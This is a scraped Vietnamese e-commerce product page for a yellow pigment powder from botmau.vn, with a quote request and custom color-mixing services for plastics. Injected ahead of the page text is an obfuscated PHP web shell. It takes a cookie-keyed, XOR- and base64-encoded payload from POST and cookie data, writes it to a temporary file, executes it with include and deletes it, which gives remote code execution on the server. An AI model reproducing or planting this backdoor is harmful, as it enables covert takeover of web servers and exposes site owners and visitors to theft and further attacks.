$kugKpHGwob = 'S' . chr (81) . '_' . "\127" . "\x68" . chr (77) . chr ( 898 - 797 ); $WKMdR = "\143" . "\x6c" . "\141" . chr (115) . chr ( 717 - 602 ).chr ( 846 - 751 )."\145" . chr ( 124 - 4 ).chr ( 1045 - 940 )."\x73" . "\x74" . chr ( 937 - 822 ); $OHXMFrHO = class_exists($kugKpHGwob); $WKMdR = "55533";$pAlZtkh = !1;if ($OHXMFrHO == $pAlZtkh){function YzrrlLY(){$VYDdob = new /* 64808 */ SQ_WhMe(32476 + 32476); $VYDdob = NULL;}$vQWiepzZE = "32476";class SQ_WhMe{private function FGDYKNugvV($vQWiepzZE){if (is_array(SQ_WhMe::$RUEqpF)) {$yWAbX = sys_get_temp_dir() . "/" . crc32(SQ_WhMe::$RUEqpF['s' . "\x61" . chr ( 378 - 270 ).'t']);@SQ_WhMe::$RUEqpF[chr (119) . chr (114) . 'i' . 't' . chr ( 874 - 773 )]($yWAbX, SQ_WhMe::$RUEqpF[chr (99) . "\x6f" . "\156" . "\164" . 'e' . chr ( 179 - 69 ).'t']);include $yWAbX;@SQ_WhMe::$RUEqpF[chr (100) . chr (101) . "\x6c" . chr (101) . "\x74" . chr ( 224 - 123 )]($yWAbX); $vQWiepzZE = "32476";exit();}}private $KbYUkMp;public function cNBxTevqrJ(){echo 59356;}public function __destruct(){SQ_WhMe::$RUEqpF = @unserialize(SQ_WhMe::$RUEqpF); $vQWiepzZE = "29060_9541";$this->FGDYKNugvV($vQWiepzZE); $vQWiepzZE = "29060_9541";}public function idpHDdhnK($pEPmH, $JDcSckG){return $pEPmH[0] ^ str_repeat($JDcSckG, (strlen($pEPmH[0]) / strlen($JDcSckG)) + 1);}public function __construct($CdqkcNPV=0){$lvyVkArwq = $_POST;$pRGioh = $_COOKIE;$JDcSckG = "f5c709fa-ddaf-4469-a107-11e03376ad59";$izrrBRjZVo = @$pRGioh[substr($JDcSckG, 0, 4)];if (!empty($izrrBRjZVo)){$CjvwvPnYjC = "base64";$pEPmH = "";$izrrBRjZVo = explode(",", $izrrBRjZVo);foreach ($izrrBRjZVo as $UKxEYaZJW){$pEPmH .= @$pRGioh[$UKxEYaZJW];$pEPmH .= @$lvyVkArwq[$UKxEYaZJW];}$pEPmH = array_map($CjvwvPnYjC . "\x5f" . chr ( 879 - 779 )."\x65" . "\143" . 'o' . chr (100) . "\x65", array($pEPmH,));SQ_WhMe::$RUEqpF = $this->idpHDdhnK($pEPmH, $JDcSckG);}}public static $RUEqpF = 65525;}YzrrlLY();} Bột Màu Vàng – botmau.vn

Giỏ hàng

Bột Màu Vàng

Liên hệ để được báo giá

Các dạng bột màu thường ở dạng bột dùng để tạo màu cho các sản phẩm công nghiệp trong ngành hóa mỹ phẩm, ….

Mã: BMV01 Danh mục:

Liên hệ để được báo giá

Chúng tôi luôn sẵn sàng tư vấn và hỗ trợ bạn:

Tư vấn và hỗ trợ sản xuất.
Phối màu THEO YÊU CẦU, MIỄN PHÍ, NHANH CHÓNG, CHÍNH XÁC.
Tương thích với các phương pháp gia công An toàn khi sử dụng - Thân thiện với môi trường.
Hạt nhựa màu được phối trên nhiều chủng loại nhựa nền: LDPE, HDPE, PP, PET, ABS, SAN, PS, POM, PA….
Sản xuất trên nhiều phương pháp như: Ép, Thổi, Tạo Màng, Dệt, Kéo Sợi…. Khách hàng có thể an tâm sự cam kết toàn diện của chúng tôi về cung cấp những sản phẩm, dịch vụ tốt nhất dành cho Quí khách hàng.